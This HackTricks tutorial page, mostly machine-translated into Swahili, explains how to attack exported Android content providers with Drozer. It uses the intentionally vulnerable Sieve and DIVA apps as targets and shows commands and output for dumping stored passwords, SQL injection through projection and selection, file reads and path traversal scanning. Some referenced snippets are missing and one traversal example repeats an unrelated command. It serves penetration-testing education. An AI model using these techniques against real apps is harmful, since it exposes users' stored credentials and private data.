Exploiting Content Providers

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Intro

Data inapatikana kutoka kwa programu moja hadi nyingine kwa ombi la kipengele kinachojulikana kama mtoa maudhui. Maombi haya yanadhibitiwa kupitia metode za ContentResolver class. Watoa maudhui wanaweza kuhifadhi data zao katika maeneo mbalimbali, kama vile database, files, au kupitia network.

Katika faili Manifest.xml, tangazo la mtoa maudhui linahitajika. Kwa mfano:

<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>

Ili kufikia content://com.mwr.example.sieve.DBContentProvider/Keys, ruhusa ya READ_KEYS inahitajika. Ni ya kuvutia kutambua kwamba njia /Keys/ inapatikana katika sehemu ifuatayo, ambayo haijalindwa kutokana na makosa ya mende, ambaye alilinda /Keys lakini alitangaza /Keys/.

Labda unaweza kufikia data za kibinafsi au kutumia udhaifu fulani (SQL Injection au Path Traversal).

Pata taarifa kutoka watoa maudhui walio wazi

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

Ni rahisi kuunganisha jinsi ya kufikia DBContentProvider kwa kuanza URIs na “content://”. Njia hii inategemea maarifa yaliyopatikana kutoka kwa kutumia Drozer, ambapo taarifa muhimu zilipatikana katika /Keys directory.

Drozer inaweza kukisia na kujaribu URIs kadhaa:

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

You should also check the ContentProvider code to search for queries:

Also, if you can't find full queries you could check which names are declared by the ContentProvider on the onCreate method:

The query will be like: content://name.of.package.class/declared_name

Database-backed Content Providers

Probable wengi wa Content Providers hutumiwa kama interface kwa database. Hivyo, ikiwa unaweza kuipata unaweza kuwa na uwezo wa kuchota, kusasisha, kuingiza na kufuta taarifa. Angalia ikiwa unaweza kupata taarifa nyeti au jaribu kubadilisha ili kuepuka mifumo ya idhinisha.

When checking the code of the Content Provider look also for functions named like: query, insert, update and delete:

Because you will be able to call them

Query content

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com

Insert content

Kwa kuhoji hifadhidata utaweza kujifunza jina la safu, kisha, utaweza kuingiza data katika DB:

Kumbuka kwamba katika kuingiza na kusasisha unaweza kutumia --string kuashiria string, --double kuashiria double, --float, --integer, --long, --short, --boolean

Update content

Ukijua jina la safu unaweza pia kubadilisha entries:

Delete content

SQL Injection

Ni rahisi kujaribu SQL injection (SQLite) kwa kubadilisha projection na selection fields ambazo zinapitishwa kwa mtoa maudhui. Wakati wa kuhoji Mtoa Maudhui kuna hoja 2 za kuvutia kutafuta taarifa: --selection na --projection:

Unaweza kujaribu kudhulumu hizi parameters ili kujaribu SQL injections:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |

Ugunduzi wa SQLInjection wa kiotomatiki na Drozer

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence

Watoa Maudhui Wanaoungwa Mkono na Mfumo wa Faili

Watoa maudhui wanaweza pia kutumika kupata faili:

Soma faili

Unaweza kusoma faili kutoka kwa Mtoa Maudhui

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Path Traversal

Ikiwa unaweza kufikia faili, unaweza kujaribu kutumia Path Traversal (katika kesi hii hii si lazima lakini unaweza kujaribu kutumia "../" na hila zinazofanana).

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Ugunduzi wa Safari ya Moja kwa Moja na Drozer

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

References

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousDrozer Tutorial NextExploiting a debuggeable application

Last updated 4 months ago